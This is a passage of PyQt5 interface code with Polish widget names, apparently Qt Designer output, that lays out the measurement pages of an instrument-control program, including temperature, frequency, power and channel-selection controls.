QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_tekst_p1.setFont(font)\n self.P2_zakres_tekst_p1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.P2_zakres_tekst_p1.setObjectName(\"P2_zakres_tekst_p1\")\n self.P2_zakres_p1 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_zakres_p1.setGeometry(QtCore.QRect(300, 730, 70, 20))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_p1.setFont(font)\n self.P2_zakres_p1.setObjectName(\"P2_zakres_p1\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n self.P2_zakres_p1.addItem(\"\")\n\n self.P2_zakres_tekst_p2 = QtWidgets.QLabel(self.P2_tryb)\n self.P2_zakres_tekst_p2.setGeometry(QtCore.QRect(770, 730, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_tekst_p2.setFont(font)\n self.P2_zakres_tekst_p2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.P2_zakres_tekst_p2.setObjectName(\"P2_zakres_tekst_p2\")\n self.P2_zakres_p2 = QtWidgets.QComboBox(self.P2_tryb)\n self.P2_zakres_p2.setGeometry(QtCore.QRect(870, 730, 70, 20))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.P2_zakres_p2.setFont(font)\n self.P2_zakres_p2.setObjectName(\"P2_zakres_p2\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n self.P2_zakres_p2.addItem(\"\")\n #---------->\n self.stackedWidget.addWidget(self.P2_tryb)\n#----------------->\n\n#<------------tryb 4-punktowy----\n self.page = QtWidgets.QWidget()\n self.page.setObjectName(\"pomiar_4pkt\")\n \n #<-----tempo i sledzenie temperatury-----------\n self.R4_temperatura_tekst = QtWidgets.QLabel(self.page)\n self.R4_temperatura_tekst.setGeometry(QtCore.QRect(750, 470, 181, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_temperatura_tekst.setFont(font)\n self.R4_temperatura_tekst.setObjectName(\"R4_temperatura_tekst\")\n\n self.R4_temperatura = QtWidgets.QLabel(self.page)\n self.R4_temperatura.setGeometry(QtCore.QRect(1050, 470, 65, 18))\n self.R4_temperatura.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n 
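        # The 9 pt QFont is rebuilt before almost every widget in this file;
        # a small hypothetical factory would remove that repetition:
        def _small_font(point_size=9):
            f = QtGui.QFont()
            f.setPointSize(point_size)
            return f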
self.R4_temperatura.setFont(font)\n self.R4_temperatura.setObjectName(\"R4_temperatura\")\n\n self.R4_tempo_tekst = QtWidgets.QLabel(self.page)\n self.R4_tempo_tekst.setGeometry(QtCore.QRect(750, 550, 181, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.R4_tempo_tekst.setFont(font)\n self.R4_tempo_tekst.setAcceptDrops(False)\n self.R4_tempo_tekst.setAutoFillBackground(False)\n self.R4_tempo_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.R4_tempo_tekst.setWordWrap(True)\n self.R4_tempo_tekst.setObjectName(\"R4_tempo_tekst\")\n\n self.R4_tempo = QtWidgets.QLabel(self.page)\n self.R4_tempo.setGeometry(QtCore.QRect(1050, 558, 65, 18))\n self.R4_tempo.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_tempo.setFont(font)\n self.R4_tempo.setObjectName(\"R4_tempo\")\n\n self.R4_sledzenie_temp_tekst = QtWidgets.QLabel(self.page)\n self.R4_sledzenie_temp_tekst.setGeometry(QtCore.QRect(750, 606, 209, 36))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.R4_sledzenie_temp_tekst.setFont(font)\n self.R4_sledzenie_temp_tekst.setAcceptDrops(False)\n self.R4_sledzenie_temp_tekst.setAutoFillBackground(False)\n self.R4_sledzenie_temp_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.R4_sledzenie_temp_tekst.setWordWrap(True)\n self.R4_sledzenie_temp_tekst.setObjectName(\"R4_sledzenie_temp_tekst\")\n\n self.R4_sledzenie_temp_okienko = QtWidgets.QCheckBox(self.page)\n self.R4_sledzenie_temp_okienko.setGeometry(QtCore.QRect(920, 610, 16, 16))\n self.R4_sledzenie_temp_okienko.setText(\"\")\n self.R4_sledzenie_temp_okienko.setObjectName(\"R4_sledzenie_temp_okienko\")\n \n self.R4_sledzenie_temp_wartosc = QtWidgets.QDoubleSpinBox(self.page)\n self.R4_sledzenie_temp_wartosc.setGeometry(QtCore.QRect(1050, 611, 65, 22))\n self.R4_sledzenie_temp_wartosc.setMinimum(-100.0)\n self.R4_sledzenie_temp_wartosc.setMaximum(100.0)\n self.R4_sledzenie_temp_wartosc.setProperty(\"value\", 1.0)\n self.R4_sledzenie_temp_wartosc.setObjectName(\"R4_sledzenie_temp_wartosc\") \n #------------>\n\n #<----okna wykresów------\n self.R4_okno_wykresu_t = QtWidgets.QWidget(self.page)\n self.R4_okno_wykresu_t.setGeometry(QtCore.QRect(730, 80, 410, 260))\n self.R4_okno_wykresu_t.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.R4_okno_wykresu_t.setObjectName(\"R4_okno_wykresu_t\")\n\n self.R4_okno_wykresu_p = QtWidgets.QWidget(self.page)\n self.R4_okno_wykresu_p.setGeometry(QtCore.QRect(40, 81, 660, 620))\n self.R4_okno_wykresu_p.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.R4_okno_wykresu_p.setObjectName(\"R4_okno_wykresu_p\")\n #------------->\n\n #<-----kanały próbka----------\n self.R4_wybor_kanalow_tekst_p = QtWidgets.QLabel(self.page)\n self.R4_wybor_kanalow_tekst_p.setGeometry(QtCore.QRect(200, 710, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_tekst_p.setFont(font)\n self.R4_wybor_kanalow_tekst_p.setObjectName(\"R4_wybor_kanalow_tekst_p\")\n \n self.R4_wybor_kanalow_p = QtWidgets.QComboBox(self.page)\n self.R4_wybor_kanalow_p.setGeometry(QtCore.QRect(300, 710, 50, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_p.setFont(font)\n self.R4_wybor_kanalow_p.setObjectName(\"R4_wybor_kanalow_p\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n 
self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n self.R4_wybor_kanalow_p.addItem(\"\")\n #------------>\n\n #<------wybór osi------ \n self.R4_wybor_osix_tekst_p = QtWidgets.QLabel(self.page)\n self.R4_wybor_osix_tekst_p.setGeometry(QtCore.QRect(550, 710, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_osix_tekst_p.setFont(font)\n self.R4_wybor_osix_tekst_p.setObjectName(\"R4_wybor_osix_tekst_p\")\n\n self.R4_wybor_osix_p = QtWidgets.QComboBox(self.page)\n self.R4_wybor_osix_p.setGeometry(QtCore.QRect(630, 710, 70, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_osix_p.setFont(font)\n self.R4_wybor_osix_p.setObjectName(\"R4_wybor_osix_p\")\n self.R4_wybor_osix_p.addItem(\"\")\n self.R4_wybor_osix_p.addItem(\"\")\n #-------------------------\n\n #<-------zakres-------\n\n self.R4_zakres_tekst = QtWidgets.QLabel(self.page)\n self.R4_zakres_tekst.setGeometry(QtCore.QRect(340, 710, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_zakres_tekst.setFont(font)\n self.R4_zakres_tekst.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.R4_zakres_tekst.setObjectName(\"R4_zakres_tekst\")\n\n self.R4_zakres_p = QtWidgets.QComboBox(self.page)\n self.R4_zakres_p.setGeometry(QtCore.QRect(440, 710, 70, 20))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_zakres_p.setFont(font)\n self.R4_zakres_p.setObjectName(\"R4_zakres_p\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n self.R4_zakres_p.addItem(\"\")\n #------------------>\n\n #<------skala log------\n self.R4_skala_log_p = QtWidgets.QCheckBox(self.page)\n self.R4_skala_log_p.setGeometry(QtCore.QRect(50, 710, 81, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_skala_log_p.setFont(font)\n self.R4_skala_log_p.setObjectName(\"R4_skala_log_p\")\n \n self.R4_skala_log_t = QtWidgets.QCheckBox(self.page)\n self.R4_skala_log_t.setGeometry(QtCore.QRect(740, 340, 141, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_skala_log_t.setFont(font)\n self.R4_skala_log_t.setObjectName(\"R4_skala_log_t\")\n #---------------\n \n #<-----czestotliowsc--------\n self.R4_czestotliowsc_tekst = QtWidgets.QLabel(self.page)\n self.R4_czestotliowsc_tekst.setGeometry(QtCore.QRect(750, 510, 200, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n font.setStyleStrategy(QtGui.QFont.PreferDefault)\n self.R4_czestotliowsc_tekst.setFont(font)\n self.R4_czestotliowsc_tekst.setAcceptDrops(False)\n self.R4_czestotliowsc_tekst.setAutoFillBackground(False)\n self.R4_czestotliowsc_tekst.setTextFormat(QtCore.Qt.AutoText)\n self.R4_czestotliowsc_tekst.setWordWrap(True)\n self.R4_czestotliowsc_tekst.setObjectName(\"R4_czestotliowsc_tekst\")\n\n self.R4_czestotliowsc = QtWidgets.QDoubleSpinBox(self.page)\n self.R4_czestotliowsc.setGeometry(QtCore.QRect(1050, 508, 65, 22))\n self.R4_czestotliowsc.setMinimum(5.0)\n self.R4_czestotliowsc.setMaximum(300.0)\n self.R4_czestotliowsc.setSingleStep(1.0)\n self.R4_czestotliowsc.setProperty(\"value\", 5.0)\n self.R4_czestotliowsc.setObjectName(\"R4_czestotliowsc\")\n #--------------->\n \n #<------moc------------\n self.R4_moc_tekst = QtWidgets.QLabel(self.page)\n 
self.R4_moc_tekst.setGeometry(QtCore.QRect(750, 400, 111, 18))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_moc_tekst.setFont(font)\n self.R4_moc_tekst.setObjectName(\"R4_moc_tekst\")\n\n self.R4_moc_suwak = QtWidgets.QSlider(self.page)\n self.R4_moc_suwak.setGeometry(QtCore.QRect(750, 430, 370, 22))\n self.R4_moc_suwak.setOrientation(QtCore.Qt.Horizontal)\n self.R4_moc_suwak.setObjectName(\"R4_moc_suwak\")\n self.R4_moc_suwak.setMinimum(0)\n self.R4_moc_suwak.setMaximum(100)\n self.R4_moc_suwak.setSingleStep(1)\n self.R4_moc_suwak.setProperty(\"value\",0)\n \n self.R4_moc = QtWidgets.QLabel(self.page)\n self.R4_moc.setGeometry(QtCore.QRect(1050, 400, 65, 18))\n self.R4_moc.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_moc.setFont(font)\n self.R4_moc.setObjectName(\"R4_moc\")\n #---------------->\n\n #<---kanały temp------ \n self.R4_wybor_kanalow_tekst_t = QtWidgets.QLabel(self.page)\n self.R4_wybor_kanalow_tekst_t.setGeometry(QtCore.QRect(990, 340, 91, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_tekst_t.setFont(font)\n self.R4_wybor_kanalow_tekst_t.setObjectName(\"R4_wybor_kanalow_tekst_t\")\n\n self.R4_wybor_kanalow_t = QtWidgets.QComboBox(self.page)\n self.R4_wybor_kanalow_t.setGeometry(QtCore.QRect(1090, 340, 50, 22))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_wybor_kanalow_t.setFont(font)\n self.R4_wybor_kanalow_t.setObjectName(\"R4_wybor_kanalow_t\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n self.R4_wybor_kanalow_t.addItem(\"\")\n #----------------->\n\n #<------wybór osi----\n\n #<------start----------- \n self.R4_start = QtWidgets.QPushButton(self.page)\n self.R4_start.setGeometry(QtCore.QRect(750, 670, 221, 61))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.R4_start.setFont(font)\n self.R4_start.setObjectName(\"R4_start\")\n\n self.R4_reset = QtWidgets.QPushButton(self.page)\n self.R4_reset.setGeometry(QtCore.QRect(990, 700, 131, 31))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.R4_reset.setFont(font)\n self.R4_reset.setObjectName(\"R4_reset\")\n \n self.R4_licznik = QtWidgets.QLabel(self.page)\n self.R4_licznik.setGeometry(QtCore.QRect(990, 670, 131, 26))\n self.R4_licznik.setMinimumSize(QtCore.QSize(60, 0))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.R4_licznik.setFont(font)\n self.R4_licznik.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.R4_licznik.setFrameShape(QtWidgets.QFrame.Panel)\n self.R4_licznik.setFrameShadow(QtWidgets.QFrame.Raised)\n self.R4_licznik.setAlignment(QtCore.Qt.AlignCenter)\n self.R4_licznik.setObjectName(\"R4_licznik\")\n #---------------->\n self.stackedWidget.addWidget(self.page)\n#---------------------------->\n\n#<------tryb ręczy--\n self.Tryb_CH20 = 
QtWidgets.QWidget()\n        self.Tryb_CH20.setObjectName(\"Tryb_CH20\")\n\n        #<---------okno wykresu----\n        self.CH20_okno_wykresu = QtWidgets.QWidget(self.Tryb_CH20)\n        self.CH20_okno_wykresu.setGeometry(QtCore.QRect(40, 80, 680, 630))\n        self.CH20_okno_wykresu.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n        self.CH20_okno_wykresu.setObjectName(\"CH20_okno_wykresu\")\n        #---------------->\n\n        #<--------skala log-----------\n        self.CH20_skala_log = QtWidgets.QCheckBox(self.Tryb_CH20)\n        self.CH20_skala_log.setGeometry(QtCore.QRect(40, 710, 91, 20))\n        font = QtGui.QFont()\n        font.setPointSize(9)\n        self.CH20_skala_log.setFont(font)\n        self.CH20_skala_log.setObjectName(\"CH20_skala_log\")\n        #------------>\n\n        #<-------czestotliwości----\n        self.CH20_czestotliowsc_in_tekst = QtWidgets.QLabel(self.Tryb_CH20)\n        self.CH20_czestotliowsc_in_tekst.setGeometry(QtCore.QRect(730, 615, 180, 22))\n        font = QtGui.QFont()\n        font.setPointSize(9)\n        font.setStyleStrategy(QtGui.QFont.PreferDefault)\n        self.CH20_czestotliowsc_in_tekst.setFont(font)\n        self.CH20_czestotliowsc_in_tekst.setAcceptDrops(False)\n        self.CH20_czestotliowsc_in_tekst.setAutoFillBackground(False)\n        self.CH20_czestotliowsc_in_tekst.setTextFormat(QtCore.Qt.AutoText)\n        self.CH20_czestotliowsc_in_tekst.setWordWrap(True)\n        self.CH20_czestotliowsc_in_tekst.setObjectName(\"CH20_czestotliowsc_in_tekst\")\n\n        self.CH20_czestotliowsc_in = QtWidgets.QDoubleSpinBox(self.Tryb_CH20)\n        self.CH20_czestotliowsc_in.setGeometry(QtCore.QRect(920, 615, 62, 22))\n        self.CH20_czestotliowsc_in.setMinimum(2.0)\n        self.CH20_czestotliowsc_in.setMaximum(300.0)\n        self.CH20_czestotliowsc_in.setSingleStep(1.0)\n        self.CH20_czestotliowsc_in.setProperty(\"value\", 3.0)\n        self.CH20_czestotliowsc_in.setObjectName(\"CH20_czestotliowsc_in\")\n\n        self.CH20_czestotliowsc_out_tekst = QtWidgets.QLabel(self.Tryb_CH20)\n        self.CH20_czestotliowsc_out_tekst.setGeometry(QtCore.QRect(730, 650, 171, 22))\n        font = QtGui.QFont()\n        font.setPointSize(9)\n        font.setStyleStrategy(QtGui.QFont.PreferDefault)\n        self.CH20_czestotliowsc_out_tekst.setFont(font)\n        self.CH20_czestotliowsc_out_tekst.setAcceptDrops(False)\n        self.CH20_czestotliowsc_out_tekst.setAutoFillBackground(False)\n        self.CH20_czestotliowsc_out_tekst.setTextFormat(QtCore.Qt.AutoText)\n        self.CH20_czestotliowsc_out_tekst.setWordWrap(True)\n        self.CH20_czestotliowsc_out_tekst.setObjectName(\"CH20_czestotliowsc_out_tekst\")\n\n        self.CH20_czestotliowsc_out = QtWidgets.QDoubleSpinBox(self.Tryb_CH20)\n        self.CH20_czestotliowsc_out.setGeometry(QtCore.QRect(920, 650, 62, 22))\n        self.CH20_czestotliowsc_out.setMinimum(5.0)\n        self.CH20_czestotliowsc_out.setMaximum(300.0)\n        self.CH20_czestotliowsc_out.setSingleStep(1.0)\n        self.CH20_czestotliowsc_out.setProperty(\"value\", 10.0)\n        self.CH20_czestotliowsc_out.setObjectName(\"CH20_czestotliowsc_out\")\n        #------------------------->\n\n        #<-----start\n        self.CH20_start = QtWidgets.QPushButton(self.Tryb_CH20)\n        self.CH20_start.setGeometry(QtCore.QRect(1000, 615, 150, 55))\n        font = QtGui.QFont()\n        font.setPointSize(12)\n        self.CH20_start.setFont(font)\n        self.CH20_start.setObjectName(\"CH20_start\")\n\n        self.CH20_reset = QtWidgets.QPushButton(self.Tryb_CH20)\n        self.CH20_reset.setGeometry(QtCore.QRect(1000, 675, 150, 35))\n        font = QtGui.QFont()\n        font.setPointSize(10)\n        self.CH20_reset.setFont(font)\n        self.CH20_reset.setObjectName(\"CH20_reset\")\n        \n        self.CH20_licznik = QtWidgets.QLabel(self.Tryb_CH20)\n        self.CH20_licznik.setGeometry(QtCore.QRect(920, 685, 62, 25))\n        self.CH20_licznik.setMinimumSize(QtCore.QSize(60, 0))\n        
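        # Hypothetical wiring sketch, commented out because the slots named here
        # are not defined in this UI file; they would live in the measurement logic:
        # self.CH20_start.clicked.connect(self.start_manual_series)
        # self.CH20_reset.clicked.connect(self.reset_counter)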
font = QtGui.QFont()\n        font.setPointSize(9)\n        self.CH20_licznik.setFont(font)\n        self.CH20_licznik.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n        self.CH20_licznik.setFrameShape(QtWidgets.QFrame.Panel)\n        self.CH20_licznik.setFrameShadow(QtWidgets.QFrame.Raised)\n        self.CH20_licznik.setAlignment(QtCore.Qt.AlignCenter)\n        self.CH20_licznik.setObjectName(\"CH20_licznik\")\n        #---------\n\n        #<----wybór kanałów i rodzaju pomiaru----------\n        self.frame = QtWidgets.QFrame(self.Tryb_CH20)\n        self.frame.setGeometry(QtCore.QRect(730, 70, 431, 541))\n        self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)\n        self.frame.setFrameShadow(QtWidgets.QFrame.Plain)\n        self.frame.setLineWidth(1)\n        self.frame.setMidLineWidth(0)\n        self.frame.setObjectName(\"frame\")\n        self.gridLayout_41 = QtWidgets.QGridLayout(self.frame)\n        self.gridLayout_41.setObjectName(\"gridLayout_41\")\n        self.frame_1 = QtWidgets.QFrame(self.frame)\n        self.frame_1.setFrameShape(QtWidgets.QFrame.Box)\n        self.frame_1.setFrameShadow(QtWidgets.QFrame.Plain)\n        self.frame_1.setLineWidth(1)\n        self.frame_1.setMidLineWidth(0)\n        self.frame_1.setObjectName(\"frame_1\")\n        self.gridLayout_4 = QtWidgets.QGridLayout(self.frame_1)\n        self.gridLayout_4.setObjectName(\"gridLayout_4\")\n        self.label_1 = QtWidgets.QLabel(self.frame_1)\n        self.label_1.setLineWidth(3)\n        self.label_1.setObjectName(\"label_1\")\n        self.gridLayout_4.addWidget(self.label_1, 0, 0, 1, 1)\n        self.checkBox_1 = QtWidgets.QCheckBox(self.frame_1)\n        self.checkBox_1.setText(\"\")\n        self.checkBox_1.setObjectName(\"checkBox_1\")\n        self.gridLayout_4.addWidget(self.checkBox_1, 0, 1, 1, 1)\n        self.comboBox_1 = QtWidgets.QComboBox(self.frame_1)\n        self.comboBox_1.setObjectName(\"comboBox_1\")\n        self.comboBox_1.addItem(\"\")\n        self.comboBox_1.addItem(\"\")\n        self.gridLayout_4.addWidget(self.comboBox_1, 0, 2, 1, 1)\n        self.gridLayout_41.addWidget(self.frame_1, 0, 0, 1, 1)\n        self.frame_11 = QtWidgets.QFrame(self.frame)\n        self.frame_11.setFrameShape(QtWidgets.QFrame.Box)\n        self.frame_11.setFrameShadow(QtWidgets.QFrame.Plain)\n        self.frame_11.setLineWidth(1)\n        self.frame_11.setMidLineWidth(0)\n        self.frame_11.setObjectName(\"frame_11\")\n        self.gridLayout_2 = QtWidgets.QGridLayout(self.frame_11)\n        self.gridLayout_2.setObjectName(\"gridLayout_2\")\n        self.label_11 = QtWidgets.QLabel(self.frame_11)\n        self.label_11.setLineWidth(3)\n        self.label_11.setObjectName(\"label_11\")\n        self.gridLayout_2.addWidget(self.label_11, 0, 0, 1, 1)\n        self.checkBox_11 = QtWidgets.QCheckBox(self.frame_11)\n        self.checkBox_11.setText(\"\")\n        self.checkBox_11.setObjectName(\"checkBox_11\")\n        self.gridLayout_2.addWidget(self.checkBox_11, 0, 1, 1, 1)\n        self.comboBox_11 = QtWidgets.QComboBox(self.frame_11)\n        self.comboBox_11.setObjectName(\"comboBox_11\")\n        self.comboBox_11.addItem(\"\")\n        self.comboBox_11.addItem(\"\")\n        self.gridLayout_2.addWidget(self.comboBox_11, 0, 2, 1, 1)\n        self.gridLayout_41.addWidget(self.frame_11, 0, 1, 1, 1)\n        self.frame_2 = QtWidgets.QFrame(self.frame)\n        self.frame_2.setFrameShape(QtWidgets.QFrame.Box)\n        self.frame_2.setFrameShadow(QtWidgets.QFrame.Plain)\n        self.frame_2.setLineWidth(1)\n        self.frame_2.setMidLineWidth(0)\n        self.frame_2.setObjectName(\"frame_2\")\n        self.gridLayout_20 = QtWidgets.QGridLayout(self.frame_2)\n        self.gridLayout_20.setObjectName(\"gridLayout_20\")\n        self.comboBox_2 = QtWidgets.QComboBox(self.frame_2)\n        self.comboBox_2.setObjectName(\"comboBox_2\")\n        self.comboBox_2.addItem(\"\")\n        self.comboBox_2.addItem(\"\")\n        self.gridLayout_20.addWidget(self.comboBox_2, 0, 2, 1, 1)\n        self.checkBox_2 = 
QtWidgets.QCheckBox(self.frame_2)\n self.checkBox_2.setText(\"\")\n self.checkBox_2.setObjectName(\"checkBox_2\")\n self.gridLayout_20.addWidget(self.checkBox_2, 0, 1, 1, 1)\n self.label_2 = QtWidgets.QLabel(self.frame_2)\n self.label_2.setLineWidth(3)\n self.label_2.setObjectName(\"label_2\")\n self.gridLayout_20.addWidget(self.label_2, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_2, 1, 0, 1, 1)\n self.frame_12 = QtWidgets.QFrame(self.frame)\n self.frame_12.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_12.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_12.setLineWidth(1)\n self.frame_12.setMidLineWidth(0)\n self.frame_12.setObjectName(\"frame_12\")\n self.gridLayout = QtWidgets.QGridLayout(self.frame_12)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.label_12 = QtWidgets.QLabel(self.frame_12)\n self.label_12.setLineWidth(3)\n self.label_12.setObjectName(\"label_12\")\n self.gridLayout.addWidget(self.label_12, 0, 0, 1, 1)\n self.checkBox_12 = QtWidgets.QCheckBox(self.frame_12)\n self.checkBox_12.setText(\"\")\n self.checkBox_12.setObjectName(\"checkBox_12\")\n self.gridLayout.addWidget(self.checkBox_12, 0, 1, 1, 1)\n self.comboBox_12 = QtWidgets.QComboBox(self.frame_12)\n self.comboBox_12.setObjectName(\"comboBox_12\")\n self.comboBox_12.addItem(\"\")\n self.comboBox_12.addItem(\"\")\n self.gridLayout.addWidget(self.comboBox_12, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_12, 1, 1, 1, 1)\n self.frame_3 = QtWidgets.QFrame(self.frame)\n self.frame_3.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_3.setLineWidth(1)\n self.frame_3.setMidLineWidth(0)\n self.frame_3.setObjectName(\"frame_3\")\n self.gridLayout_6 = QtWidgets.QGridLayout(self.frame_3)\n self.gridLayout_6.setObjectName(\"gridLayout_6\")\n self.label_3 = QtWidgets.QLabel(self.frame_3)\n self.label_3.setLineWidth(3)\n self.label_3.setObjectName(\"label_3\")\n self.gridLayout_6.addWidget(self.label_3, 0, 0, 1, 1)\n self.checkBox_3 = QtWidgets.QCheckBox(self.frame_3)\n self.checkBox_3.setText(\"\")\n self.checkBox_3.setObjectName(\"checkBox_3\")\n self.gridLayout_6.addWidget(self.checkBox_3, 0, 1, 1, 1)\n self.comboBox_3 = QtWidgets.QComboBox(self.frame_3)\n self.comboBox_3.setObjectName(\"comboBox_3\")\n self.comboBox_3.addItem(\"\")\n self.comboBox_3.addItem(\"\")\n self.gridLayout_6.addWidget(self.comboBox_3, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_3, 2, 0, 1, 1)\n self.frame_13 = QtWidgets.QFrame(self.frame)\n self.frame_13.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_13.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_13.setLineWidth(1)\n self.frame_13.setMidLineWidth(0)\n self.frame_13.setObjectName(\"frame_13\")\n self.gridLayout_14 = QtWidgets.QGridLayout(self.frame_13)\n self.gridLayout_14.setObjectName(\"gridLayout_14\")\n self.label_13 = QtWidgets.QLabel(self.frame_13)\n self.label_13.setLineWidth(3)\n self.label_13.setObjectName(\"label_13\")\n self.gridLayout_14.addWidget(self.label_13, 0, 0, 1, 1)\n self.checkBox_13 = QtWidgets.QCheckBox(self.frame_13)\n self.checkBox_13.setText(\"\")\n self.checkBox_13.setObjectName(\"checkBox_13\")\n self.gridLayout_14.addWidget(self.checkBox_13, 0, 1, 1, 1)\n self.comboBox_13 = QtWidgets.QComboBox(self.frame_13)\n self.comboBox_13.setObjectName(\"comboBox_13\")\n self.comboBox_13.addItem(\"\")\n self.comboBox_13.addItem(\"\")\n self.gridLayout_14.addWidget(self.comboBox_13, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_13, 2, 1, 1, 1)\n self.frame_4 = 
QtWidgets.QFrame(self.frame)\n self.frame_4.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_4.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_4.setLineWidth(1)\n self.frame_4.setMidLineWidth(0)\n self.frame_4.setObjectName(\"frame_4\")\n self.gridLayout_7 = QtWidgets.QGridLayout(self.frame_4)\n self.gridLayout_7.setObjectName(\"gridLayout_7\")\n self.label_4 = QtWidgets.QLabel(self.frame_4)\n self.label_4.setLineWidth(3)\n self.label_4.setObjectName(\"label_4\")\n self.gridLayout_7.addWidget(self.label_4, 0, 0, 1, 1)\n self.checkBox_4 = QtWidgets.QCheckBox(self.frame_4)\n self.checkBox_4.setText(\"\")\n self.checkBox_4.setObjectName(\"checkBox_4\")\n self.gridLayout_7.addWidget(self.checkBox_4, 0, 1, 1, 1)\n self.comboBox_4 = QtWidgets.QComboBox(self.frame_4)\n self.comboBox_4.setObjectName(\"comboBox_4\")\n self.comboBox_4.addItem(\"\")\n self.comboBox_4.addItem(\"\")\n self.gridLayout_7.addWidget(self.comboBox_4, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_4, 3, 0, 1, 1)\n self.frame_14 = QtWidgets.QFrame(self.frame)\n self.frame_14.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_14.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_14.setLineWidth(1)\n self.frame_14.setMidLineWidth(0)\n self.frame_14.setObjectName(\"frame_14\")\n 